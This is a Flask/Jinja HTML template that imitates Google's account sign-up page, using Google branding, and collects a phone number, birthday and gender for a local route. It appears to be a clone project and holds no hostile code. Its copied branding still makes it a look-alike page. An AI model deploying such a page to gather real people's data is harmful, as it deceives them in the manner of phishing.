<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.0/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-KyZXEAg3QhqLMpG8r+8fhAXLRk2vvoC2f3B09zVXn8CA5QIVfZOJ3BCsw2P0p/We" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="icon"
        href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSU9t9I8gg1rM3EteWYcm1LU8iEabzg6sO_72nr8tP9ppvcnYYAcPlwu7SWejRzcODOHKs&usqp=CAU"
        type="image/x-icon">
    <title>Create your Google Account</title>
</head>

<style>
    @media (min-width: 1700px) {
        .sign_up_form {
            padding-left: 30%;
            padding-right: 30%;
        }
    }

    @media (max-width: 1700px) {
        .sign_up_form {
            padding-left: 25%;
            padding-right: 25%;
        }
    }

    @media (max-width: 1400px) {
        .sign_up_form {
            padding-left: 20%;
            padding-right: 20%;
        }
    }

    @media (max-width: 1200px) {
        .sign_up_form {
            padding-left: 15%;
            padding-right: 15%;
        }
    }

    @media (max-width: 1000px) {
        .sign_up_form {
            padding-left: 10%;
            padding-right: 10%;
        }
    }

    @media (max-width: 900px) {
        .sign_up_form {
            padding-left: 0%;
            padding-right: 0%;
        }
    }

    @media (max-width: 768px) {
        .signup_logo {
            display: none;
        }

        .email {
            margin-left: 10px;
            width: 96%;
        }
    }

    @media (min-width: 768px) {
        .email {
            margin-left: 10px;
            width: 94%;
        }
    }

    @media (min-width: 600px) {
        .form_box {
            border: 1px solid rgb(214, 214, 214);
            margin-top: 180px;
            border-radius: 10px;
            padding-left: 40px;
            padding-top: 20px;
        }
    }

    @media (max-width: 600px) {
        .form_box {
            margin-top: 30px;
            padding-left: 40px;
            padding-right: 40px;
        }
    }
</style>

<body>
    <!-- flash message -->
    {% with messages = get_flashed_messages(with_categories=true) %}
    {% if messages %}
    {% for category, message in messages %}
    <div class="alert alert-{{ category }}">
        {{ message }}
    </div>
    {% endfor %}
    {% endif %}
    {% endwith %}
    <form action="/gmail_signup_next_page" method="post" class="sign_up_form">
        <div class="container form_box">
            <div class="row">
                <div class="col-12 col-md-6">
                    <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_160x56dp.png" alt=""
                        class="mt-3" width="68px" height="27px">
                    <p style="font-size: 22px; margin-top: 5px;">FirstName, welcome to Google</p>
                    <p style="font-size: 17px; margin-top: -3px; font-weight: 570;"><i class="fa fa-user-circle-o"></i>
                        usernamekimail@gmail.com</p>
                    <span class="dropdown">
                        <button class="btn dropdown-toggle" type="button" id="dropdownMenuButton1"
                            data-bs-toggle="dropdown" aria-expanded="false">
                            <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ2qcakz13L09MciK4WqJ95kCRqqFphjyCX1uNUEtcFnxrlIBX_eYQ35CiFF1OWjibExuM&usqp=CAU"
                                width="30" height="20" alt="">
                        </button>
                    </span>
                    <span><input type="text" placeholder="Phone Number" aria-describedby="emailHelp"
                            name="phone_no"></span>
                    <div id="emailHelp" class="form-text" style="font-size: 12px;">Google will use this number only for
                        account security. Your number won’t be visible to others. You can choose later whether to use it
                        for other purposes.</div><br>
                    <span>
                        <select name="birth_month" style="padding: 4px;" required aria-describedby="emailHelp">
                            <option value="">Month</option>
                            <option value="01">Jan</option>
                            <option value="02">Feb</option>
                            <option value="03">Mar</option>
                            <option value="04">Apr</option>
                            <option value="05">May</option>
                            <option value="06">June</option>
                            <option value="07">July</option>
                            <option value="08">Aug</option>
                            <option value="09">Sept</option>
                            <option value="10">Oct</option>
                            <option value="11">Nov</option>
                            <option value="12">Dec</option>
                        </select>
                        <input type="text" name="birth_date" style="width: 80px; margin-left: 10px; padding: 4px;"
                            placeholder="Day" required maxlength="2">
                        <input type="text" name="birth_year" style="width: 80px; margin-left: 10px; padding: 4px;"
                            placeholder="Year" required maxlength="4" minlength="4">
                    </span>
                    <div id="emailHelp" class="form-text" style="font-size: 12px;">Your Birthday</div><br>
                    <select name="gender" style="width: 78%; padding: 4px;" required>
                        <option value="">Gender</option>
                        <option value="male">Male</option>
                        <option value="female">Female</option>
                        <option value="other">Other</option>
                    </select><br><br>
                    <button type="submit" class="btn btn-primary"
                        style="float: right; margin-bottom: 30px;">Next</button>
                </div>
                <div class="col-md-6 signup_logo" style="text-align: center; margin-top: 60px;">
                    <img src="https://ssl.gstatic.com/accounts/signup/glif/personal.svg" alt="" height="250px"
                        width="250px">
                    <p style="font-size: 16px;">Your personal info is private & safe</p>
                </div>
            </div>
        </div>
    </form>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.0/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-U1DAWAznBHeqEIlVSCgzq+c9gqGAJn5c/t99JyeKa9xxaYpSvHU5awsuZVVFIhvj"
        crossorigin="anonymous"></script>

</body>

</html>